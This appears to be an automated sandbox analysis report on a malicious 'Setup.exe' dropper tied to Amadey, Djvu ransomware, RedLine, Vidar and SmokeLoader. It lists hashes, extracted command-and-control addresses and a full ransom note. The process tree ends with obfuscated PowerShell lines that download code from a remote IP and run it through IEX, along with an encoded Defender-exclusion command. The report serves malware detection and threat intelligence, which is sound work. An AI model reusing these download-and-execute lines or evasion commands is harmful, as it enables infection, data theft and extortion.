amadey | f5b3eb889230479909676d757fa8fa735133c28278b1a31e3563ffdd49c3a455

Analysis

max time kernel
68s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
23-05-2022 11:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Setup.exe
Size

312KB
MD5

9b85ec9cb71f0e4f684b2a3bb25b2752
SHA1

4b6739d0f3fd9af2dccb098ebc9dd1787b378e2b
SHA256

f5b3eb889230479909676d757fa8fa735133c28278b1a31e3563ffdd49c3a455
SHA512

5257ccae180e3f042047c764396bf435075925861ddb44700e19bf7eefb69decc0f91820a24a3ac38640a83302037d4c9821abed817ec7bb95481fd57eed6866

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://31.41.244.231/0x?0=RedLine

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://31.41.244.231/0xMine/RegAsm.go

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://31.41.244.231/0xSocks/go.go

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://31.41.244.231/0xMine/go.go

Extracted

Family

amadey

Version

3.10

185.215.113.38/f8dfksdj3/index.php

Extracted

Family

djvu

http://ugll.org/test3/get.php

Attributes

extension
.fefg
offline_id
eBNgvyGQV1Hmt9DBdxVRs8qPi1agsS7OaohPmit1
payload_url
http://zerit.top/dl/build2.exe
http://ugll.org/files/1/build3.exe
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-j3AdKrnQie Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: admin@helpdata.top Reserve e-mail address to contact us: supportsys@airmail.cc Your personal ID: 0482JIjdm

rsa_pubkey.plain

Extracted

Family

vidar

Version

52.2

Botnet

937

https://t.me/netflixaccsfree

https://mastodon.social/@ronxik12

Attributes

profile_id
937

Extracted

Family

smokeloader

Version

2020

http://monsutiur4.com/

http://nusurionuy5ff.at/

http://moroitomo4.net/

http://susuerulianita1.net/

http://cucumbetuturel4.com/

http://nunuslushau.com/

http://linislominyt11.at/

http://luxulixionus.net/

http://lilisjjoer44.com/

http://nikogminut88.at/

http://limo00ruling.org/

http://mini55tunul.com/

http://samnutu11nuli.com/

http://nikogkojam.org/

rc4.i32

Extracted

Family

redline

Botnet

@humus228p

185.215.113.24:15994

Attributes

auth_value
bb99a32fdff98741feb69d524760afae

Extracted

Family

redline

Botnet

x$x

31.41.244.235:45692

Attributes

auth_value
9d676174bb75fae2926c953902d64ae9

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

Detected Djvu ransomware 7 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2824-216-0x0000000002280000-0x000000000239B000-memory.dmp	family_djvu
behavioral2/memory/4760-228-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/4760-225-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/4760-219-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/4760-235-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/5540-333-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/5540-336-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu

Djvu Ransomware
Ransomware which is a variant of the STOP family.
ransomware djvu
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rundll32.exe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4880 1884 rundll32.exe
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4880	1884	rundll32.exe

RedLine Payload 5 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\Pictures\Adobe Films\Fenix_12.bmp.exe	family_redline
behavioral2/memory/528-176-0x0000000000900000-0x000000000098C000-memory.dmp	family_redline
C:\Users\Admin\Pictures\Adobe Films\Fenix_12.bmp.exe	family_redline
behavioral2/memory/112-252-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral2/memory/3620-262-0x0000000000D20000-0x0000000000DA6000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
suricata: ET MALWARE Amadey CnC Check-In
suricata: ET MALWARE Amadey CnC Check-In
suricata
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
suricata
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata
suricata: ET MALWARE Vidar/Arkei/Megumin Stealer Keywords Retrieved
suricata: ET MALWARE Vidar/Arkei/Megumin Stealer Keywords Retrieved
suricata
suricata: ET MALWARE W32/Agent.OGR!tr.pws Stealer
suricata: ET MALWARE W32/Agent.OGR!tr.pws Stealer
suricata
suricata: ET MALWARE Win32/Filecoder.STOP Variant Public Key Download
suricata: ET MALWARE Win32/Filecoder.STOP Variant Public Key Download
suricata
suricata: ET MALWARE Win32/Filecoder.STOP Variant Request for Public Key
suricata: ET MALWARE Win32/Filecoder.STOP Variant Request for Public Key
suricata
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
suricata
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata
suricata: ET MALWARE Win32/Vodkagats Loader Requesting Payload
suricata: ET MALWARE Win32/Vodkagats Loader Requesting Payload
suricata

Vidar Stealer 2 IoCs

stealer

Processes:

resource	yara_rule
behavioral2/memory/3608-244-0x00000000007D0000-0x000000000081E000-memory.dmp	family_vidar
behavioral2/memory/3608-245-0x0000000000400000-0x00000000004AB000-memory.dmp	family_vidar

Downloads MZ/PE file

Executes dropped EXE 20 IoCs

Processes:

NiceProcessX64.bmp.exefile2.exe.exeService.bmp.exeSetupMEXX.exe.exerrmix.exe.exeFJEfRXZ.exe.exetest33.bmp.exepen4ik_v0.7b__windows_64.bmp.execamera.exe.exeFenix_12.bmp.exefxdd.bmp.exeolympteam_build_crypted_3.bmp.exerezki1.bmp.exe6523.exe.exemixinte2205.bmp.exereal2201.bmp.exewam.exe.exetest33.bmp.exeorxds.exeJOoZKZ_fvtxPLHStfQ0P12at.exe

pid	process
824	NiceProcessX64.bmp.exe
3164	file2.exe.exe
1484	Service.bmp.exe
2160	SetupMEXX.exe.exe
1724	rrmix.exe.exe
3968	FJEfRXZ.exe.exe
2824	test33.bmp.exe
2456	pen4ik_v0.7b__windows_64.bmp.exe
3684	camera.exe.exe
528	Fenix_12.bmp.exe
3660	fxdd.bmp.exe
3620	olympteam_build_crypted_3.bmp.exe
3872	rezki1.bmp.exe
760	6523.exe.exe
3036	mixinte2205.bmp.exe
3608	real2201.bmp.exe
4188	wam.exe.exe
4760	test33.bmp.exe
4844	orxds.exe
4816	JOoZKZ_fvtxPLHStfQ0P12at.exe

Sets file to hidden 1 TTPs
Modifies file attributes to stop it showing in Explorer etc.
evasion

Hidden Files and Directories
T1158

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\Pictures\Adobe Films\pen4ik_v0.7b__windows_64.bmp.exe	upx
C:\Users\Admin\Pictures\Adobe Films\pen4ik_v0.7b__windows_64.bmp.exe	upx
C:\Users\Admin\AppData\Roaming\link.exe	upx
C:\Users\Admin\AppData\Roaming\link.exe	upx

VMProtect packed file 6 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
C:\Users\Admin\Pictures\Adobe Films\fxdd.bmp.exe	vmprotect
C:\Users\Admin\Pictures\Adobe Films\fxdd.bmp.exe	vmprotect
behavioral2/memory/3660-202-0x0000000000150000-0x0000000000A11000-memory.dmp	vmprotect
C:\Users\Admin\AppData\Local\Temp\8c7aecc852\orxds.exe	vmprotect
C:\Users\Admin\AppData\Local\Temp\8c7aecc852\orxds.exe	vmprotect
behavioral2/memory/4844-250-0x00000000005A0000-0x0000000000E61000-memory.dmp	vmprotect

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

JOoZKZ_fvtxPLHStfQ0P12at.exeSetup.exefile2.exe.exeService.bmp.exefxdd.bmp.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation	JOoZKZ_fvtxPLHStfQ0P12at.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation	Setup.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation	file2.exe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation	Service.bmp.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation	fxdd.bmp.exe

Modifies file permissions 1 TTPs 1 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exe

pid process

1656 icacls.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
1656	icacls.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

FJEfRXZ.exe.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	FJEfRXZ.exe.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	FJEfRXZ.exe.exe

Looks up external IP address via web service 11 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

114 api.2ip.ua
18 ipinfo.io
84 ipinfo.io
85 ipinfo.io
89 ipinfo.io
115 api.2ip.ua
118 ipinfo.io
201 api.2ip.ua
16 ipinfo.io
217 ipinfo.io
202 api.2ip.ua

flow	ioc
114	api.2ip.ua
18	ipinfo.io
84	ipinfo.io
85	ipinfo.io
89	ipinfo.io
115	api.2ip.ua
118	ipinfo.io
201	api.2ip.ua
16	ipinfo.io
217	ipinfo.io
202	api.2ip.ua

Suspicious use of SetThreadContext 2 IoCs

Processes:

test33.bmp.exeolympteam_build_crypted_3.bmp.exe

description	pid	process	target process
PID 2824 set thread context of 4760	2824	test33.bmp.exe	test33.bmp.exe
PID 3620 set thread context of 112	3620	olympteam_build_crypted_3.bmp.exe	AppLaunch.exe

Drops file in Program Files directory 2 IoCs

Processes:

Service.bmp.exe

description	ioc	process
File created	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	Service.bmp.exe
File opened for modification	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	Service.bmp.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 18 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
4900	3036	WerFault.exe	mixinte2205.bmp.exe
2152	3036	WerFault.exe	mixinte2205.bmp.exe
3988	3036	WerFault.exe	mixinte2205.bmp.exe
3868	3036	WerFault.exe	mixinte2205.bmp.exe
3184	3036	WerFault.exe	mixinte2205.bmp.exe
3912	3036	WerFault.exe	mixinte2205.bmp.exe
5328	4912	WerFault.exe	mixinte2205.bmp.exe
5980	4912	WerFault.exe	mixinte2205.bmp.exe
5960	3036	WerFault.exe	mixinte2205.bmp.exe
5536	3484	WerFault.exe	rundll32.exe
5724	3036	WerFault.exe	mixinte2205.bmp.exe
5672	4912	WerFault.exe	mixinte2205.bmp.exe
3912	4912	WerFault.exe	mixinte2205.bmp.exe
5968	3608	WerFault.exe	real2201.bmp.exe
4900	1724	WerFault.exe	rrmix.exe.exe
5124	2160	WerFault.exe	SetupMEXX.exe.exe
6068	4912	WerFault.exe	mixinte2205.bmp.exe
5492	3684	WerFault.exe	camera.exe.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

6523.exe.exe

description	ioc	process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	6523.exe.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	6523.exe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	6523.exe.exe

Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

5392 schtasks.exe
5292 schtasks.exe
3848 schtasks.exe
4876 schtasks.exe
4960 schtasks.exe
2508 schtasks.exe
Delays execution with timeout.exe 2 IoCs
evasion

Processes:

timeout.exetimeout.exe

pid process

5716 timeout.exe
5228 timeout.exe
Enumerates processes with tasklist 1 TTPs 4 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exetasklist.exetasklist.exe

pid process

5496 tasklist.exe
2152 tasklist.exe
436 tasklist.exe
4820 tasklist.exe
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command-Line Interface
T1059

Processes:

netstat.exe

pid process

5452 netstat.exe
GoLang User-Agent 2 IoCs
Uses default user-agent string defined by GoLang HTTP packages.

Processes:

description flow ioc

HTTP User-Agent header 239 Go-http-client/1.1
HTTP User-Agent header 236 Go-http-client/1.1
Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

5328 taskkill.exe
4608 taskkill.exe
Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXE

pid process

4988 PING.EXE
5244 PING.EXE
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.

Processes:

description flow ioc

HTTP User-Agent header 91 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

pid	process
5392	schtasks.exe
5292	schtasks.exe
3848	schtasks.exe
4876	schtasks.exe
4960	schtasks.exe
2508	schtasks.exe

pid	process
5716	timeout.exe
5228	timeout.exe

pid	process
5496	tasklist.exe
2152	tasklist.exe
436	tasklist.exe
4820	tasklist.exe

pid	process
5452	netstat.exe

description	flow	ioc
HTTP User-Agent header	239	Go-http-client/1.1
HTTP User-Agent header	236	Go-http-client/1.1

pid	process
5328	taskkill.exe
4608	taskkill.exe

pid	process
4988	PING.EXE
5244	PING.EXE

description	flow	ioc
HTTP User-Agent header	91	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

Setup.exeNiceProcessX64.bmp.exe

pid	process
3568	Setup.exe
3568	Setup.exe
824	NiceProcessX64.bmp.exe
824	NiceProcessX64.bmp.exe
824	NiceProcessX64.bmp.exe
824	NiceProcessX64.bmp.exe
824	NiceProcessX64.bmp.exe
824	NiceProcessX64.bmp.exe
824	NiceProcessX64.bmp.exe
824	NiceProcessX64.bmp.exe
824	NiceProcessX64.bmp.exe
824	NiceProcessX64.bmp.exe
824	NiceProcessX64.bmp.exe
824	NiceProcessX64.bmp.exe
824	NiceProcessX64.bmp.exe
824	NiceProcessX64.bmp.exe
824	NiceProcessX64.bmp.exe
824	NiceProcessX64.bmp.exe
824	NiceProcessX64.bmp.exe
824	NiceProcessX64.bmp.exe
824	NiceProcessX64.bmp.exe
824	NiceProcessX64.bmp.exe
824	NiceProcessX64.bmp.exe
824	NiceProcessX64.bmp.exe
824	NiceProcessX64.bmp.exe
824	NiceProcessX64.bmp.exe
824	NiceProcessX64.bmp.exe
824	NiceProcessX64.bmp.exe
824	NiceProcessX64.bmp.exe
824	NiceProcessX64.bmp.exe
824	NiceProcessX64.bmp.exe
824	NiceProcessX64.bmp.exe
824	NiceProcessX64.bmp.exe
824	NiceProcessX64.bmp.exe
824	NiceProcessX64.bmp.exe
824	NiceProcessX64.bmp.exe
824	NiceProcessX64.bmp.exe
824	NiceProcessX64.bmp.exe
824	NiceProcessX64.bmp.exe
824	NiceProcessX64.bmp.exe
824	NiceProcessX64.bmp.exe
824	NiceProcessX64.bmp.exe
824	NiceProcessX64.bmp.exe
824	NiceProcessX64.bmp.exe
824	NiceProcessX64.bmp.exe
824	NiceProcessX64.bmp.exe
824	NiceProcessX64.bmp.exe
824	NiceProcessX64.bmp.exe
824	NiceProcessX64.bmp.exe
824	NiceProcessX64.bmp.exe
824	NiceProcessX64.bmp.exe
824	NiceProcessX64.bmp.exe
824	NiceProcessX64.bmp.exe
824	NiceProcessX64.bmp.exe
824	NiceProcessX64.bmp.exe
824	NiceProcessX64.bmp.exe
824	NiceProcessX64.bmp.exe
824	NiceProcessX64.bmp.exe
824	NiceProcessX64.bmp.exe
824	NiceProcessX64.bmp.exe
824	NiceProcessX64.bmp.exe
824	NiceProcessX64.bmp.exe
824	NiceProcessX64.bmp.exe
824	NiceProcessX64.bmp.exe

Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

6523.exe.exe

pid process

760 6523.exe.exe

pid	process
760	6523.exe.exe

Suspicious use of AdjustPrivilegeToken 17 IoCs

Processes:

Fenix_12.bmp.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exewam.exe.exerrmix.exe.exeSetupMEXX.exe.exerezki1.bmp.execamera.exe.exe

description	pid	process
Token: SeDebugPrivilege	528	Fenix_12.bmp.exe
Token: SeDebugPrivilege	2268	powershell.exe
Token: SeDebugPrivilege	2548	powershell.exe
Token: SeDebugPrivilege	3780	powershell.exe
Token: SeDebugPrivilege	1720	powershell.exe
Token: SeDebugPrivilege	2828	powershell.exe
Token: SeDebugPrivilege	4188	wam.exe.exe
Token: SeDebugPrivilege	1724	rrmix.exe.exe
Token: SeDebugPrivilege	2160	SetupMEXX.exe.exe
Token: SeDebugPrivilege	3872	rezki1.bmp.exe
Token: SeDebugPrivilege	3684	camera.exe.exe
Token: SeShutdownPrivilege	2604
Token: SeCreatePagefilePrivilege	2604
Token: SeShutdownPrivilege	2604
Token: SeCreatePagefilePrivilege	2604
Token: SeShutdownPrivilege	2604
Token: SeCreatePagefilePrivilege	2604

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

file2.exe.exe

pid process

3164 file2.exe.exe

pid	process
3164	file2.exe.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Setup.exefile2.exe.exeFJEfRXZ.exe.exe

description	pid	process	target process
PID 3568 wrote to memory of 824	3568	Setup.exe	NiceProcessX64.bmp.exe
PID 3568 wrote to memory of 824	3568	Setup.exe	NiceProcessX64.bmp.exe
PID 3568 wrote to memory of 3164	3568	Setup.exe	file2.exe.exe
PID 3568 wrote to memory of 3164	3568	Setup.exe	file2.exe.exe
PID 3568 wrote to memory of 3164	3568	Setup.exe	file2.exe.exe
PID 3568 wrote to memory of 1484	3568	Setup.exe	Service.bmp.exe
PID 3568 wrote to memory of 1484	3568	Setup.exe	Service.bmp.exe
PID 3568 wrote to memory of 1484	3568	Setup.exe	Service.bmp.exe
PID 3164 wrote to memory of 2548	3164	file2.exe.exe	powershell.exe
PID 3164 wrote to memory of 2548	3164	file2.exe.exe	powershell.exe
PID 3164 wrote to memory of 2548	3164	file2.exe.exe	powershell.exe
PID 3164 wrote to memory of 2268	3164	file2.exe.exe	powershell.exe
PID 3164 wrote to memory of 2268	3164	file2.exe.exe	powershell.exe
PID 3164 wrote to memory of 2268	3164	file2.exe.exe	powershell.exe
PID 3568 wrote to memory of 2160	3568	Setup.exe	SetupMEXX.exe.exe
PID 3568 wrote to memory of 2160	3568	Setup.exe	SetupMEXX.exe.exe
PID 3568 wrote to memory of 2160	3568	Setup.exe	SetupMEXX.exe.exe
PID 3164 wrote to memory of 1720	3164	file2.exe.exe	powershell.exe
PID 3164 wrote to memory of 1720	3164	file2.exe.exe	powershell.exe
PID 3164 wrote to memory of 1720	3164	file2.exe.exe	powershell.exe
PID 3568 wrote to memory of 1724	3568	Setup.exe	rrmix.exe.exe
PID 3568 wrote to memory of 1724	3568	Setup.exe	rrmix.exe.exe
PID 3568 wrote to memory of 1724	3568	Setup.exe	rrmix.exe.exe
PID 3164 wrote to memory of 3780	3164	file2.exe.exe	powershell.exe
PID 3164 wrote to memory of 3780	3164	file2.exe.exe	powershell.exe
PID 3164 wrote to memory of 3780	3164	file2.exe.exe	powershell.exe
PID 3164 wrote to memory of 2828	3164	file2.exe.exe	powershell.exe
PID 3164 wrote to memory of 2828	3164	file2.exe.exe	powershell.exe
PID 3164 wrote to memory of 2828	3164	file2.exe.exe	powershell.exe
PID 3568 wrote to memory of 3968	3568	Setup.exe	FJEfRXZ.exe.exe
PID 3568 wrote to memory of 3968	3568	Setup.exe	FJEfRXZ.exe.exe
PID 3568 wrote to memory of 3968	3568	Setup.exe	FJEfRXZ.exe.exe
PID 3568 wrote to memory of 2824	3568	Setup.exe	test33.bmp.exe
PID 3568 wrote to memory of 2824	3568	Setup.exe	test33.bmp.exe
PID 3568 wrote to memory of 2824	3568	Setup.exe	test33.bmp.exe
PID 3568 wrote to memory of 2456	3568	Setup.exe	pen4ik_v0.7b__windows_64.bmp.exe
PID 3568 wrote to memory of 2456	3568	Setup.exe	pen4ik_v0.7b__windows_64.bmp.exe
PID 3568 wrote to memory of 3684	3568	Setup.exe	camera.exe.exe
PID 3568 wrote to memory of 3684	3568	Setup.exe	camera.exe.exe
PID 3568 wrote to memory of 3684	3568	Setup.exe	camera.exe.exe
PID 3568 wrote to memory of 528	3568	Setup.exe	Fenix_12.bmp.exe
PID 3568 wrote to memory of 528	3568	Setup.exe	Fenix_12.bmp.exe
PID 3568 wrote to memory of 528	3568	Setup.exe	Fenix_12.bmp.exe
PID 3568 wrote to memory of 3660	3568	Setup.exe	fxdd.bmp.exe
PID 3568 wrote to memory of 3660	3568	Setup.exe	fxdd.bmp.exe
PID 3568 wrote to memory of 3660	3568	Setup.exe	fxdd.bmp.exe
PID 3568 wrote to memory of 3620	3568	Setup.exe	olympteam_build_crypted_3.bmp.exe
PID 3568 wrote to memory of 3620	3568	Setup.exe	olympteam_build_crypted_3.bmp.exe
PID 3568 wrote to memory of 3620	3568	Setup.exe	olympteam_build_crypted_3.bmp.exe
PID 3568 wrote to memory of 760	3568	Setup.exe	6523.exe.exe
PID 3568 wrote to memory of 760	3568	Setup.exe	6523.exe.exe
PID 3568 wrote to memory of 760	3568	Setup.exe	6523.exe.exe
PID 3568 wrote to memory of 3872	3568	Setup.exe	rezki1.bmp.exe
PID 3568 wrote to memory of 3872	3568	Setup.exe	rezki1.bmp.exe
PID 3568 wrote to memory of 3872	3568	Setup.exe	rezki1.bmp.exe
PID 3568 wrote to memory of 3036	3568	Setup.exe	mixinte2205.bmp.exe
PID 3568 wrote to memory of 3036	3568	Setup.exe	mixinte2205.bmp.exe
PID 3568 wrote to memory of 3036	3568	Setup.exe	mixinte2205.bmp.exe
PID 3568 wrote to memory of 3608	3568	Setup.exe	real2201.bmp.exe
PID 3568 wrote to memory of 3608	3568	Setup.exe	real2201.bmp.exe
PID 3568 wrote to memory of 3608	3568	Setup.exe	real2201.bmp.exe
PID 3968 wrote to memory of 3404	3968	FJEfRXZ.exe.exe	ftp.exe
PID 3968 wrote to memory of 3404	3968	FJEfRXZ.exe.exe	ftp.exe
PID 3968 wrote to memory of 3404	3968	FJEfRXZ.exe.exe	ftp.exe

Views/modifies file attributes 1 TTPs 2 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exe

pid process

6060 attrib.exe
6120 attrib.exe

pid	process
6060	attrib.exe
6120	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\Setup.exe"
1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3568

C:\Users\Admin\Pictures\Adobe Films\NiceProcessX64.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\NiceProcessX64.bmp.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:824

C:\Users\Admin\Pictures\Adobe Films\file2.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\file2.exe.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3164

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc IABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQAnAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAJwAgACAALQBGAG8AcgBjAGUAOwA=
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2548

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{YESS}(N{YESS}{YESS}e{YESS}w-{YESS}Ob{YESS}{YESS}je{YESS}{YESS}c{YESS}t N{YESS}{YESS}e{YESS}t.W{YESS}e';$c4='b{YESS}{YESS}Cli{YESS}{YESS}en{YESS}{YESS}t{YESS}).Do{YESS}{YESS}wn{YESS}{YESS}l{YESS}o';$c3='a{YESS}dS{YESS}{YESS}t{YESS}ri{YESS}{YESS}n{YESS}g{YESS}(''h{YESS}tt{YESS}p:/{YESS}/31.41.244.231/0x?0=RedLine''){YESS}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{YESS}',''); IEX $TC |IEX
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2268

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
4⤵
PID:4148

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
4⤵
PID:800

C:\Windows\SysWOW64\svchost.exe
"C:\Windows\System32\svchost.exe"
5⤵
PID:3484

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{YESS}(N{YESS}{YESS}e{YESS}w-{YESS}Ob{YESS}{YESS}je{YESS}{YESS}c{YESS}t N{YESS}{YESS}e{YESS}t.W{YESS}e';$c4='b{YESS}{YESS}Cli{YESS}{YESS}en{YESS}{YESS}t{YESS}).Do{YESS}{YESS}wn{YESS}{YESS}l{YESS}o';$c3='a{YESS}dS{YESS}{YESS}t{YESS}ri{YESS}{YESS}n{YESS}g{YESS}(''h{YESS}tt{YESS}p:/{YESS}/31.41.244.231/0xMine/RegAsm.go''){YESS}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{YESS}',''); IEX $TC |IEX
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1720

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
4⤵
PID:6084

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{YESS}(N{YESS}{YESS}e{YESS}w-{YESS}Ob{YESS}{YESS}je{YESS}{YESS}c{YESS}t N{YESS}{YESS}e{YESS}t.W{YESS}e';$c4='b{YESS}{YESS}Cli{YESS}{YESS}en{YESS}{YESS}t{YESS}).Do{YESS}{YESS}wn{YESS}{YESS}l{YESS}o';$c3='a{YESS}dS{YESS}{YESS}t{YESS}ri{YESS}{YESS}n{YESS}g{YESS}(''h{YESS}tt{YESS}p:/{YESS}/31.41.244.231/0xSocks/go.go''){YESS}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{YESS}',''); IEX $TC |IEX
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2828

